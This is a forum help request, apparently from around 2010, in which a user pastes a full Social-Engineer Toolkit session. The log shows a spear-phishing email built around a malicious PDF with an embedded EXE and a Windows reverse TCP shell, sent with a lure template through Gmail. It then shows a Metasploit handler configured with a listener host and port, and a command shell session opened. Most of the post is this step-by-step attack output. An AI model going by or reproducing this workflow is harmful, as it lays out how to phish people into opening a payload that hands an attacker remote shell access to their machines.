hello all
i am trying to get remote access to my main computer on my network using the set email attack.
however when i open the pdf i do not get command line access!
see below:
thanks in advance for the advice
yoma
Code:
Code:
                 .M"""bgd `7MM"""YMM MMP""MM""YMM
                ,MI    "Y   MM    `7 P'   MM   `7
                `MMb.       MM   d        MM
                  `YMMNq.   MMmmMM        MM
                .     `MM   MM   Y  ,     MM
                Mb     dM   MM     ,M     MM
                P"Ybmmd"  .JMMmmmmMMM   .JMML.

  [---]       The Social-Engineer Toolkit (SET)          [---]
  [---]         Written by David Kennedy (ReL1K)         [---]
  [---]                 Version: 0.4.1                   [---]
  [---]      Codename: 'Rise of the Pink Pirate'         [---]
  [---]     Report bugs to: davek@social-engineer.org    [---]
  [---]      Check out: http://social-engineer.org       [---]
  [---]        Homepage: http://www.secmaniac.com        [---]
  [---] Tutorial: http://offsec.com/metasploit-unleashed [---]
  [---]      Unpublished Java Applet by: Thomas Werth    [---]

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

Select from the menu on what you would like to do:

1. Spear-Phishing (Email) Attacks
2. Website Attack Vectors
3. Update the Metasploit Framework
4. Update the Social-Engineer Toolkit
5. Create a Payload and Listener
6. Help, Credits, and About
7. Exit the Social-Engineer Toolkit

Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu.

Enter your choice: 1

Select the file format exploit you want.
The default is the PDF embedded EXE.

        ********** PAYLOADS **********

1. Adobe Collab.collectEmailInfo Buffer Overflow
2. Adobe Collab.getIcon Buffer Overflow
3. Adobe JBIG2Decode Memory Corruption Exploit
4. Adobe PDF Embedded EXE Social Engineering
5. Adobe util.printf() Buffer Overflow
6. Custom EXE to VBA (sent via RAR) (RAR required)
7. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun

Enter the number you want (press enter for default): 4
You have selected the default payload creation. SET will generate a normal PDF with embedded EXE.

1. Windows Reverse TCP Shell
2. Windows Meterpreter Reverse_TCP
3. Windows Reverse VNC
4. Windows Reverse TCP Shell (x64)
5. Windows Meterpreter Reverse_TCP (X64)
6. Windows Shell Bind_TCP (X64)

Enter the payload you want (press enter for default): 1
Enter the port to connect back on (press enter for default):[*] Defaulting to port 443...[*] Generating fileformat exploit...[*] Please wait while we load the module tree...[*] Started reverse handler on 192.168.1.3:443[*] Reading in 'src/msf_attacks/form.pdf'...[*] Parsing 'src/msf_attacks/form.pdf'...[*] Parsing Successful.[*] Using 'windows/shell_reverse_tcp' as payload...[*] Creating 'template.pdf' file...[*] Generated output file /pentest/exploits/SET/src/program_junk/template.pdf[*] Payload creation complete.[*] All payloads get sent to the src/msf_attacks/template.pdf directory[*] Payload generation complete. Press enter to continue.


As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

Enter your choice (enter for default): 1
Keeping the filename and moving on.

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one indivdual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 1
Below is a list of available templates:

1: LOL...have to check this out...
2: Dan Brown's Angels & Demons
3: Baby Pics
4: New Update
5: Computer Issue
6: Status Report
7: Strange internet usage from your computer

Enter the number you want to use: 1

Enter who you want to send email to:(my email)

What option do you want to use?

1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice: 1
Enter your GMAIL email address: (same email again)
Enter your password for gmail (it will not be displayed back to you):


SET has finished deliverying the emails.

Do you want to setup a listener yes or no: yes

                                  _       _
             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|


       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 535 exploits - 254 auxiliary
+ -- --=[ 198 payloads - 23 encoders - 8 nops
       =[ svn r8859 updated today (2010.03.20)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.3
LHOST => 192.168.1.3
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.[*] Started reverse handler on 192.168.1.3:443[*] Starting the payload handler...
msf exploit(handler) >[*] Command shell session 1 opened (192.168.1.3:443 -> 192.168.1.4:3768)

msf exploit(handler) >